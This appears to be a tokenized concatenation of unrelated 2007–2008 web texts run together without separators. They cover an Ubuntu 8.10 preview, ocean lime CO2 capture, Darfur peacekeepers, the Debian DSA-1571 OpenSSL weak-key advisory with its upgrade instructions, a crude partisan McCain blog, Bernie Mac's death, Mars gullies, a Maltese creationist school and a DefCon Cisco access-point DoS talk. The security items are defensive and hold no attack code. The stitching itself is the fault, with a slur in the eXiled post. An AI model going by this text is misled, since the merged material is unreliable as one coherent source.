The most notable plans for subnotebook supremacy in Intrepid are better support for mobile networking , improved startup time , and official support for USB installation images .
Network configuration in the current version of Ubuntu is handled by NetworkManager , which offers simple point - and - click support for connecting to WiFi access points .
The new version of NetworkManager , which will be included in Ubuntu 8.10 , adds basic support for 3G networking .
In addition to integrating the new version of NetworkManager , the Ubuntu developers will also conduct testing to ensure compatibility with the most commonly used 3G networking devices and services .
Improving boot performance in Intrepid is another high priority for Ubuntu on mobile devices .
This will be done by integrating prefetching , a predictive loading strategy .
A participant in Google 's Summer of Code program last year created a prefetching implementation for Ubuntu that has been found to reduce boot time by roughly 6.31 seconds and reduces startup time for certain large programs like OpenOffice.org .
The Ubuntu developers will also be migrating more system services like D - Bus and HAL to Upstart , an asynchronous replacement for the legacy init system that is roughly similar to Apple 's launchd .
Many subnotebook mobile devices do not have optical drives , which makes it difficult for users to install Linux distributions on them .
Some clever users have modified existing distributions and offered customized USB installation images that simplify the process of getting a popular distro onto devices like the Eee PC .
The Ubuntu developers plan to officially support USB installation by creating a cross- platform utility similar to Fedora 's new LiveUSB Creator that will take an ISO CD image and automatically generate a modified version that will be written to a USB disk .
In addition to subnotebook improvements , Ubuntu 8.10 will get an assortment of other new features and notable application upgrades , including OpenOffice.org 3 and improved KDE integration for Firefox .
Another big change that is going on right now is a visual overhaul , which will bring a new look to Ubuntu .
A major theme change was originally planned for 8.04 , but it was deferred for various reasons until now .
The new style will use dark colors with bright orange highlights .
Work on this has already started and a very rough first attempt is visible in alpha 1 .
It 's important to note that this effort is still early in development and will likely undergo a lot of changes before it is finished .
Dark colors have traditionally not been particularly well supported or executed in GNOME themes , but there has been a recent trend in that direction among some GNOME developers .
Having a dark theme by default in a prominent distribution will likely help to expose some of the most significant issues with dark themes , which will ensure that they are better supported in the future .
The new theme uses the Murrine theme engine instead of Clearlooks , which means that designers will have a lot more flexibility and the ability to deliver an aesthetically richer experience .
As I 've written many times before , I 'm not a particularly big fan of Ubuntu 's themes .
There are a few third - party Gtk+ themes with similarly dark color schemes that look a lot more polished , such as the official Ubuntu Studio theme and the Murrine Human Dark theme from the ColorizeMe scripts collection .
I do n't particularly think that the new dark brown iteration shipped with alpha 1 is an improvement , but there is still a lot of time for it to evolve during the development cycle before the official release .
The alpha release is available for download from the Ubuntu web site .
There are also Kubuntu and Xubuntu flavors of the alpha too .
LiveCD images are not available right now , so you need to use the text - based alternate installation image .
Keep in mind that alpha releases are not intended for use in production environments and there are still a lot of bugs .
Additional alpha releases will be distributed in July , August , and September .
A beta release is planned for the beginning of October and the final release is tentatively scheduled for October 30 .
Further reading
Scientists say they have found a workable way of reducing CO2 levels in the atmosphere by adding lime to seawater .
And they think it has the potential to dramatically reverse CO2 accumulation in the atmosphere , reports Cath O’Driscoll in SCI ’s Chemistry & Industry magazine published today .
Shell is so impressed with the new approach that it is funding an investigation into its economic feasibility .
‘ We think it ’s a promising idea , ’ says Shell ’s Gilles Bertherin , a coordinator on the project .
‘ There are potentially huge environmental benefits from addressing climate change – and adding calcium hydroxide to seawater will also mitigate the effects of ocean acidification , so it should have a positive impact on the marine environment . ’
Adding lime to seawater increases alkalinity , boosting seawater ’s ability to absorb CO2 from air and reducing the tendency to release it back again .
However , the idea , which has been bandied about for years , was thought unworkable because of the expense of obtaining lime from limestone and the amount of CO2 released in the process .
Tim Kruger , a management consultant at London firm Corven is the brains behind the plan to resurrect the lime process .
He argues that it could be made workable by locating it in regions that have a combination of low - cost ‘ stranded ’ energy considered too remote to be economically viable to exploit – like flared natural gas or solar energy in deserts – and that are rich in limestone , making it feasible for calcination to take place on site .
Kruger says : ‘ There are many such places – for example , Australia ’s Nullarbor Plain would be a prime location for this process , as it has 10 000 km3 of limestone and soaks up roughly 20 MJ / m2 of solar irradiation every day . ’
The process of making lime generates CO2 , but adding the lime to seawater absorbs almost twice as much CO2 .
The overall process is therefore ‘ carbon negative ’ .
‘ This process has the potential to reverse the accumulation of CO2 in the atmosphere .
It would be possible to reduce CO2 to pre-industrial levels , ’ Kruger says .
And Professor Klaus Lackner , a researcher in the field from Columbia University , says : ‘ The theoretical CO2 balance is roughly right … it is certainly worth thinking through carefully . ’
The oceans are already the world ’s largest carbon sink , absorbing 2bn tonnes of carbon every year .
Increasing absorption ability by just a few percent could dramatically increase CO2 uptake from the atmosphere .
This project is being developed in an open source manner .
To find out more , please go to www.cquestrate.com, a new website , launched today .
They ’re looking for us !
As you know , we ’ve been fucked over for good in Russia .
“ Why they done gone ‘n do that ? ” you ask in your innocent / retarded Deliverance way ?
Well , we ’re too busy hiding from the FSB , so we ’ll let our more successful and less - endangered colleagues in the Big Media tell you all about it :
Plus :
Read more : banned in russia , censorship , the exile , Team eXiled , Russia Babylon
Got something to say to us ?
Then send us a letter .
Want us to stick around ?
Donate to The eXiled .
Twitter twerps can follow us at twitter.com/exiledonline
Mr Bashir is accused of masterminding the deaths of thousands in Darfur Sudan has again warned it cannot guarantee the safety of UN and African Union peacekeepers in Darfur if its president is indicted for war crimes .
A presidential adviser said that if the International Criminal Court indicted Omar al - Bashir , Sudan could not be held responsible for the troops ' well - being .
Earlier this month , the ICC prosecutor asked judges in The Hague to issue an arrest warrant for President Bashir .
The judges are expected to announce their decision in a few weeks ' time .
The adviser , Bona Malual , told the BBC the government was not expelling the joint UN / AU force ( Unamid ) , or even threatening the troops .
It was , he said , simply saying how Sudan would view the situation .
Seven UN peacekeepers were killed in an ambush in northern Darfur the week before the prosecutor 's request .
Visas in question Mr Malual , a veteran south Sudanese politician , was speaking in Ethiopia , which he is visiting as part of Sudan 's diplomatic offensive against the indictment .
The UN and African Union operate a hybrid mission in Darfur He was more forthright than any other Sudanese spokesman has been so far about the effect a possible indictment might have on peacekeeping and humanitarian operations in Darfur , says the BBC's Elizabeth Blunt in the Ethiopian capital , Addis Ababa .
Mr Malual suggested Unamid could become a kind of Trojan Horse , bringing the threat of arrest into Sudan 's own sovereign territory .
He said it meant that the government could not be held responsible for the security and well - being of the peacekeepers and other foreign nationals in Darfur .
It was not a question of asking them to withdraw , he said , but if they did not take this seriously , and left their people in Darfur and anything happened to them , then it was their own responsibility .
The only thing the government might do , he added , would be to cancel the visas and permits they needed to remain in the country .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
[ SECURITY ] [ DSA 1571 - 1 ]
New openssl packages fix predictable random number generator
To : debian-security-announce@lists.debian.org
Subject : [ SECURITY ] [ DSA 1571 - 1 ]
New openssl packages fix predictable random number generator
From : Florian Weimer < fw@deneb.enyo.de >
Date : Tue , 13 May 2008 14:06:39 +0200
Message - id : < [ 🔎 ] 87od7az9v4.fsf@mid.deneb.enyo.de >
Reply - to : debian-security@lists.debian.org
-----BEGIN PGP SIGNED MESSAGE -----
Hash : SHA1 - ------------------------------------------------------------------------
Debian Security Advisory DSA -1571-1 security@debian.org
http://www.debian.org/security/
Florian Weimer May 13 , 2008 http://www.debian.org/security/faq
-
------------------------------------------------------------------------
Package : openssl Vulnerability : predictable random number generator Problem type : remote Debian - specific : yes CVE Id(s ) : CVE -2008 -0166
Luciano
Bello discovered that the random number generator in Debian 's openssl package is predictable .
This is caused by an incorrect Debian - specific change to the openssl package ( CVE - 2008 - 0166 ) .
As a result , cryptographic key material may be guessable .
This is a Debian - specific vulnerability which does not affect other operating systems which are not based on Debian .
However , other systems can be indirectly affected if weak keys are imported into them .
It is strongly recommended that all cryptographic key material which has been generated by OpenSSL versions starting with 0.9.8 c - 1 on Debian systems is recreated from scratch .
Furthermore , all DSA keys ever used on affected Debian systems for signing or authentication purposes should be considered compromised ; the Digital Signature Algorithm relies on a secret random value used during signature generation .
The first vulnerable version , 0.9.8c - 1 , was uploaded to the unstable distribution on 2006 - 09 - 17 , and has since propagated to the testing and current stable ( etch ) distributions .
The old stable distribution ( sarge ) is not affected .
Affected keys include SSH keys , OpenVPN keys , DNSSEC keys , and key material for use in X.509 certificates and session keys used in SSL / TLS connections .
Keys generated with GnuPG or GNUTLS are not affected , though .
A detector for known weak key material will be published at : < http://security.debian.org/project/extra/dowkd/dowkd.pl.gz>
< http://security.debian.org/project/extra/dowkd/dowkd.pl.gz.asc>
( OpenPGP signature )
Instructions how to implement key rollover for various packages will be published at : < http://www.debian.org/security/key-rollover/>
This web site will be continously updated to reflect new and updated instructions on key rollovers for packages using SSL certificates .
Popular packages not affected will also be listed .
In addition to this critical change , two other vulnerabilities have been fixed in the openssl package which were originally scheduled for release with the next etch point release : OpenSSL 's DTLS ( Datagram TLS , basically " SSL over UDP " ) implementation did not actually implement the DTLS specification , but a potentially much weaker protocol , and contained a vulnerability permitting arbitrary code execution ( CVE - 2007-4995 ) .
A side channel attack in the integer multiplication routines is also addressed ( CVE - 2007 - 3108 ) .
For the stable distribution ( etch ) , these problems have been fixed in version 0.9.8c - 4etch3 .
For the unstable distribution ( sid ) and the testing distribution ( lenny ) , these problems have been fixed in version 0.9.8 g - 9 .
We recommend that you upgrade your openssl package and subsequently regenerate any cryptographic material , as outlined above .
Upgrade instructions - --------------------
wget url will fetch the file for you dpkg - i file .
deb will install the referenced file .
If you are using the apt - get package manager , use the line for sources .
list as given below : apt - get update will update the internal database apt - get upgrade will install corrected packages
You may use an automated update by adding the resources from the footer to the proper configuration .
Debian GNU / Linux 4.0 alias etch -
-------------------------------
Source archives : http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3.dsc
Size / MD5 checksum : 1099 5e60a893c9c3258669845b0a56d9d9d6
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c.orig.tar.gz
Size / MD5 checksum : 3313857 78454bec556bcb4c45129428a766c886 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3.diff.gz
Size / MD5 checksum : 55320 f0e457d6459255da86f388dcf695ee20 alpha architecture ( DEC Alpha ) http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_alpha.deb
Size / MD5 checksum : 1025954 d82f535b49f8c56aa2135f2fa52e7059 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_alpha.deb
Size / MD5 checksum : 4558230 399adb0f2c7faa51065d4977a7f3b3c4 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_alpha.deb
Size / MD5 checksum : 2620892 0e5efdec0a912c5ae56bb7c5d5d896c6 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_alpha.deb
Size / MD5 checksum : 2561650 affe364ebcabc2aa33ae8b8c3f797b5e http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_alpha.udeb
Size / MD5 checksum : 677172 5228d266c1fc742181239019dbad4c42 amd64 architecture ( AMD x86_64 ( AMD64 ) )
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_amd64.deb
Size / MD5 checksum : 1654902 d8ad8dc51449cf6db938d2675789ab25 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_amd64.deb
Size / MD5 checksum : 891102 2e97e35c44308a59857d2e640ddf141a
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_amd64.deb
Size / MD5 checksum : 992248 82193ea11b0bc08c74a775039b855a05 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_amd64.deb
Size / MD5 checksum : 2178610 fb7c53e5f157c43753db31885 ff68420 http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_amd64.udeb
Size / MD5 checksum : 580250 7fb3d7fee129cc9a4fb21f5c471dfbab arm architecture ( ARM )
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_arm.deb
Size / MD5 checksum : 1537440 c5ab48e9bde49ba32648fb581b90ba18 http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_arm.udeb
Size / MD5 checksum : 516576 84385b137c731de3b86824c17affa9f3 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_arm.deb
Size / MD5 checksum : 2049882 7ed60840eb3e6b26c6856dcaf5776b0c http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_arm.deb
Size / MD5 checksum : 1011698 abfa887593089ac0f1cd4e31154897ee http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_arm.deb
Size / MD5 checksum : 805912 a605625ea107252e9aebbc77902a63ed hppa architecture ( HP PA RISC )
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_hppa.deb
Size / MD5 checksum : 1585900 2cbe55764db351dc6c3c2d622aa90 caf
http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_hppa.deb
Size / MD5 checksum : 2248328 664fb0992b786ce067a7d878056fc191 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_hppa.deb
Size / MD5 checksum : 1030782 21f445c541d5e5b7c16de1db9ee9d681 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_hppa.deb
Size / MD5 checksum : 945144 c1092f3bb94d920d0beaa372c9cab04e http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_hppa.udeb
Size / MD5 checksum : 631132 76339119275786b5e80a7a1b4cd26b71 i386 architecture ( Intel ia32 ) http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_i386.deb
Size / MD5 checksum : 2086512 eeef437fb87ad6687cd953d5951aa472 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_i386.deb
Size / MD5 checksum : 5584696 6d364557c9d392bb90706e049860be66 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_i386.deb
Size / MD5 checksum : 1000832 ed5668305f1e4b4e4a22fbd24514c758 http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_i386.udeb
Size / MD5 checksum : 554676 dbad0172c990359282884bac1d141034 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_i386.deb
Size / MD5 checksum : 2717086 361fde071d18ccf93338134357ab1a61 ia64 architecture ( Intel ia64 ) http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_ia64.udeb
Size / MD5 checksum : 801748 05b29fc674311bd31fe945036a08abd5 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_ia64.deb
Size / MD5 checksum : 1192192 56be85aceb4e79e45f39c4546bfecf4f http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_ia64.deb
Size / MD5 checksum : 2593418 f9edaea0a86c1a1cea391f890d7ee70f
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_ia64.deb
Size / MD5 checksum : 1569418 4b2cb04d13efabdddddbd0f6d3cefd9 b
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_ia64.deb
Size / MD5 checksum : 1071156 e1f487c4310ad526c071f7483de4cd1a mips architecture ( MIPS ( Big Endian ) )
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_mips.deb
Size / MD5 checksum : 1003816 f895a8bc714e9c373ee80f736b5af00b http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_mips.deb
Size / MD5 checksum : 2262266 004484e816d4fe5ff03fe6d7df38d7b7 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_mips.deb
Size / MD5 checksum : 1692606 e8273f5d123f892a81a155f14ba19b50 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_mips.deb
Size / MD5 checksum : 875558 44074bce1cde4281c5abcf45817f429d http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_mips.udeb
Size / MD5 checksum : 580130 b6b810d1c39164747e3ebc9df4903974 mipsel architecture ( MIPS ( Little Endian ) )
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_mipsel.udeb
Size / MD5 checksum : 566168 97963ca9b6ada94445fb25b3126655e9 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_mipsel.deb
Size / MD5 checksum : 992712 41c2bbe984553d693f21c3ec349ea465 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_mipsel.deb
Size / MD5 checksum : 2255558 3c63936cd511975291b4230bef1a2e3 b http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_mipsel.deb
Size / MD5 checksum : 860506 d580fbeed6efd734245ea7a7bed225bb
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_mipsel.deb
Size / MD5 checksum : 1649300 3315d1406f995f5b6d2a4f958976a794 powerpc architecture ( PowerPC )
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_powerpc.deb
Size / MD5 checksum : 1002022 b2749639425c3a8ac493e072cfffb358 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_powerpc.deb
Size / MD5 checksum : 895460 e15fbbbbcfe17e82bacc07f6febd9707
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_powerpc.udeb
Size / MD5 checksum : 585320 61488ea7f54b55a21f7147fe5bc3b0f0 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_powerpc.deb
Size / MD5 checksum : 1728384 539ee1a3fe7d9b89034ebfe3c1091b6f http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_powerpc.deb
Size / MD5 checksum : 2210792 82e9e27c6083a95c76c5817f9604178f s390 architecture ( IBM S/390 )
http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_s390.udeb
Size / MD5 checksum : 643008 4861c78ea63b6c3c08c22a0c5326d981 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_s390.deb
Size / MD5 checksum : 1632976 01d289d460622382b59d07950305764f http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_s390.deb
Size / MD5 checksum : 951404 d92bb390489bed0abff58f7a1ceade6 b
http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_s390.deb
Size / MD5 checksum : 1014308 487c24f2af25797a857814af7c9c0d0b http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_s390.deb
Size / MD5 checksum : 2193782 f1fe472c802e929a57bd8c8560bd3009 sparc architecture ( Sun SPARC / UltraSPARC )
http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch3_sparc.deb
Size / MD5 checksum : 4091340 970453ebfab8152c9c44ae210 fbaa2a4 http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch3_sparc.udeb
Size / MD5 checksum : 539054 7be1258f74165c4b037e202d2048f8ce http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch3_sparc.deb
Size / MD5 checksum : 1010536 6444d6cc6fd838c82716462aacd1cf84 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch3_sparc.deb
Size / MD5 checksum : 2108000 ab0d0ccc72764a26b7767cace520b269 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch3_sparc.deb
Size / MD5 checksum : 2126386 61ddc204ee650cdd0f2b56e358134e2b
These files will probably be moved into the stable distribution on its next update .
- ---------------------------------------------------------------------------------
For apt - get : deb http://security.debian.org/
stable / updates main
For dpkg - ftp : ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list : debian-security-announce@lists.debian.org
Package info : `apt - cache show < pkg > ' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE ----- Version : GnuPG v1.4.6 ( GNU / Linux ) iQEVAwUBSCmDjL97/wQC1SS+AQLZGgf8Dp7Rj1HmC4n0QowM9cRnzw24upFQ1bpq
SbkU/NhkoLORcMnXsnVPL30bmtpXltjpWuKIuRGzudXBonXaZtX1N4rl9HDpN+gt
AZJdxweSSmwQNyvOyPRKDVJ1w/YYiaJnSIDNks6NqSNYSEAb5L3bHBeHDTgLsWMW
jYcF5GJSt8yG3GvA0FyFIPwJihr2YF/RmhpurGQf3XO6S94cDsdLtr/KOcdmdWze 39E+2h3L34HGIwVUgK9uY8Gv0DCPqhQZ4157CteFpQwQoKzFSxYApruCm4QcFxV+
BxuB / M9M5tPWrX1slffG+q3YHK0
mDnB9d2JqSwQ5TD9kxTiwEEY8sQ== =lX6B -----END PGP SIGNATURE -----
It ’s been several days now , and the McCain campaign has not only refused to comment on why they accepted a $ 2300 check from a gay - sex maven , but even more interesting , the campaign is keeping the money and they ’re not telling anyone why .
Do n’t get me wrong , I think it ’s great that John McCain is comfortable taking a maximum donation from a guy running a sex site called Manhunt ( though many are now calling it McCainhunt ) .
And it ’s even more laudable that McCain ’s money is coming from a gay sex site .
I have nothing against either , in fact some of my best friends … well you know .
I do , however , find it funnier than hell that McCain does n’t have a problem taking money earned quite literally from gay sodomy ( though it ’s pretty clear that McCain does not want to lose gay Republicans , thus the reason he ’s keeping sex money over what I ’m sure are the objections of Evangelicals – guess we ’re seeing how much McCain actually cares about James Dobson ’s values now ! ) , and I ’m simply astounded that the corporate media – save a very few people like Ben Smith and the Boston Herald – have given McCain a pass on this story .
Unless the corporate media plans to never again do a story on controversial donors to campaigns , they need to explain why they ’re not covering this particular story .
Or is it only news to the corporate media when a Democrat has a controversial donor ?
I do n’t plan on letting this story go any time soon .
The longer McCain hangs on to the donation , the longer we ’ll be trumpeting McCain ’s embrace of gay sodomy .
Not that there ’s anything wrong with this .
Oh yeah , that ’s right , according to McCain and the Republican party there is .
Bernie Mac Dead at Age 50
died early this morning after a long hospitalization for pneumonia .
The comedian , who 's real name is Bernard McCullough , passed away at Northwestern Memorial Hospital in Chicago .
He was 50 - years - old .
Earlier this week , after rumors that he was dead began circulating on the internet , Mac 's rep issued a statment saying , “ Bernie Mac is still alive and being treated in a Chicago hospital for pneumonia and is expected to make a full recovery .
We once again ask that the press respect his privacy and that of his family . ”
Sadly , he issued another statement this morning saying , " Actor / comedian Bernie Mac passed away this morning from complications due to pneumonia in a Chicago area hospital .
No other details are available at this time .
We ask that his family 's privacy continues to be respected . "
Our thoughts and prayers go out to family and friends .
Researchers examining images of gullies on the flanks of craters on Mars say they formed as recently as a few hundred thousand years ago and in sites once occupied by glaciers .
The features are eerily reminiscent of gullies formed in Antarctica 's mars - like McMurdo Dry Valleys .
The parallels between the Martian gullies and those in Antarctica 's McMurdo Dry Valleys were made using the latest high - resolution images and technology from satellites orbiting Mars to observe key details of their geological setting .
On Mars , the gullies appear to originate from cirque - like features high on pole - facing crater - interior walls , especially those within the Newton crater , 40 °S , examined for the study .
In addition to the cirque - like features , the evidence cited for former glaciation includes bowl - shaped depressions fringed by lobate , viscous - flow deposits that extend well out onto the crater floor .
" These bowl - shaped depressions reflect the former location of relatively pure glacier ice , " noted David R. Marchant , an Associate Professor of Earth Sciences at Boston University , and co-author of the study published in the August 25th issue of the Proceedings of the National Academy of Sciences with James W. Head of Brown University , lead author , and Mikhail A. Kreslavsky of the University of California , Santa Cruz .
As conditions on Mars shifted toward reduced snowfall at this site , clean ice on the crater wall sublimated , leaving a hole , whereas ice containing appreciable rock - fall debris out on the crater floor became covered with thin rubble , preventing complete volatile loss .
But even as the last glaciers vanished , minor snow likely continued to fall .
" This late - stage snow could accumulate in depressions on the crater wall and , in favorable microclimate settings , melt to produce the observed gullies and fans , " said Marchant .
" The results " , he said , " are exciting because they establish a spatial link between recent gullies and accumulation of glacier ice , strengthening the case for surface melt water flow in the formation of gullies on Mars " .
Other candidate processes include dry debris flows and melting of shallow ground ice , but the sequence of events demonstrating recent snowfall in Newton Crater make surface melting of snow banks an appealing choice .
In fact , both Marchant and Head have observed similar processes at work in the development of modern gullies within some of the coldest and driest regions of Antarctica .
The authors conclude that changes in the rate and accumulation of snow in Newton Crater are likely related to changes in the inclination of Mars ' spin axis , or obliquity .
At obliquities even greater than those postulated for glaciation of Newton Crater , the same authors and colleagues postulated even larger - scale mountain glaciation near the equator , on and extending out from the Tharsis volcanoes .
The evidence suggests a link between obliquity , mid-latitude glaciation , and gully formation on Mars .
Rather than being a dead planet , the new data are consistent with dynamic climate change on Mars , and with episodes of alpine glaciation and melt water formation in the recent past that rival modern alpine glaciation and gully formation in the coldest and driest mountains of Antarctica .
NASA and the National Science Foundation funded the research .
NEWS | Sunday , 14 October 2007
Dinosaurs helped build the pyramids , school director says Raphael Vassallo Far from becoming extinct 65 million years ago , the dinosaurs actually co-existed with early humans , and even helped in the construction of the pyramids .
This is the word of Vince Fenech , Evangelist pastor and director of a fully licensed , State - approved Creationist institution which admits children aged between four and 18 .
“ Of course the ‘ dinoceros ’ existed ( as Fenech pronounces the word ) .
It is mentioned in the Book of Job .
They were used to help build the pyramids , ” he says , adding that this latter observation is only “ his personal belief ” , and that it does not form part of the school ’s curriculum .
But the curriculum of the Accelerated Christian Academy in Mosta is not exactly free of such fanciful reinventions of history .
Fenech reiterates the basic Evangelist tenet that the entire universe was created in 4004 BC … and this time , he also supplies “ proof ” .
“ When man landed on the moon ( in 1969 ) , they expected the landing module to sink in a deep layer of dust .
But the layer was only a few inches deep .
This proves that the universe is still young ! ”
Does it ?
I would have thought it merely illustrates that unlike the Earth , the moon has little or nothing in the way of atmosphere … and dust is usually generated as a result of particles which combine as they are buffeted around by the movement of atmospheric molecules .
Also , the moon ’s gravity is two thirds less than it is on Earth … which in turn means that dust is practically weightless , and therefore does n’t settle .
But of course there is little point in saying so , because as far as Fenech in concerned , it is the word of God alone that counts .
Fenech confirmed this during an impromptu interview at the MaltaToday office in San Gwann , where he irrupted last Thursday on a Divine Mission to correct my misconceptions about his Mosta academy .
“ Your write - up last Sunday was full of mistakes , ” he pointed out .
Foremost among the mistakes is the incorrect identification of Fenech as “ headmaster ” instead of director … an error which I acknowledge , and for which I apologise .
“ You also wrote last Sunday that God created Adam and Eve , ” Fenech continues .
“ This is not true .
The first woman did not have a name ; she was made from Adam ’s rib and was known only as ‘ woman ’ .
She got the name ‘ Eve ’ only after the expulsion from the Garden of Eden .
You can quote me on that … ”
Fenech suddenly seems very keen on being quoted .
“ We do n’t just teach our students about evolution , ” he continues enthusiastically .
“ We also teach them , for example , that abortion is murder … and you can quote me on that , too ! ”
This was evidently intended as an automatic trump card , in a country where any public assertion of pro-life values automatically entitles one to instant respectability .
Intrigued , I ask Fenech for more details about the school ’s approach to controversial social issues .
To teach that “ abortion is murder ” – regardless of one ’s opinion in the matter – presupposes at least a basic knowledge of the human reproductive system .
In other words , sex .
Considering that the ACA accepts students as young as four : how old are students when they are taught about sex , abortion and murder ?
Strangely , however , Vincent Fenech appears incapable of giving a straight answer .
Instead , after humming and hawing and generally avoiding the issue , he suddenly denies having made the claim in the first place .
“ We do not teach that abortion is murder , ” he insists , contradicting himself totally in less than five minutes .
“ What we teach is ‘ Thou shalt not kill ’ . ”
Pressed further , Fenech eventually admits that the classes at the ACA at not composed according to the traditional model .
Instead , it seems that children of varying ages are mixed together in one class … although the school ’s director will not be drawn into explaining precisely how .
“ But you , what do you believe in ? ” he suddenly asks .
“ What do you think will happen to you after you die ? ”
I do n’t know , I answer .
I imagine my body will decompose , rot and eventually disappear …
Assuming an air of lofty superiority , Fenech places his hand on heart as he simpers : “ I , on the other hand , know exactly what will happen to me .
I will go to Heaven .
It is written in the Scriptures : only those who are reborn in Christ will see the Kingdom of God … ”
That may well be the case , but it is not written in the National Curriculum .
So for the second time in two weeks , I sent questions to Education Director Cecilia M. Borg on the subject of the Accelerated Christian Academy in Mosta , and all the unscientific nonsense evidently taught therein .
I asked Dr Borg , whether the education division was aware of resolution no .
1580 , passed by the Council of Europe ’s parliamentary assembly on 4 October 2007 , entitled “ The dangers of creationism in education ” .
The resolution observes that “ the war on the theory of evolution and on its proponents most often originates in forms of religious extremism which are closely allied to extreme right - wing political movements ” , and urges EU member states to “ to firmly oppose the teaching of creationism as a scientific discipline on an equal footing with the theory of evolution and in general resist presentation of creationist ideas in any discipline other than religion ? ”
Dr Borg promptly sent the following reply : “ From previous correspondence I am sure you could clearly deduce that the position of the Education Division is perfectly aligned to the Council of Europe Resolution 1580 since it was made amply clear that while every school is obliged by law to follow the National Minimum Curriculum in all curricular matters , religious , moral and ethical instruction is imparted in respect to the freedom of belief as guaranteed by the Constitution and in the light of ‘ the right of every parent of a minor to give his decision with regard to any matter concerning the education which the minor is to receive , ’ as entrenched in article 6 . of the Education Act . ”
Any comments ?
If you wish your comments to be published in our Letters pages please click here
If you wish your comments to be published in our Letters pages please
On Saturday AirTight at DefCon 16 will trick Cisco wireless LAN access points into committing suicide , reports Brad Reese .
The company will share its findings about self destructive behavior spotted in select open source and commercial 802.11 APs .
AirTight says it will demonstrate that by sending specially crafted packets , it is possible to trigger autoimmunity disorder and cause an AP to turn hostile against its own clients .
According to AirTight : " Although 802.11w promises immunity from DoS attacks , we show that autoimmunity disorder leaves a door open through which DoS attacks can still be launched . "
In Brad 's blog , AirTight describes an example of a denial of service against MFP ( 11w ) .
Join the Network World communities on Facebook and LinkedIn to comment on topics that are top of mind .
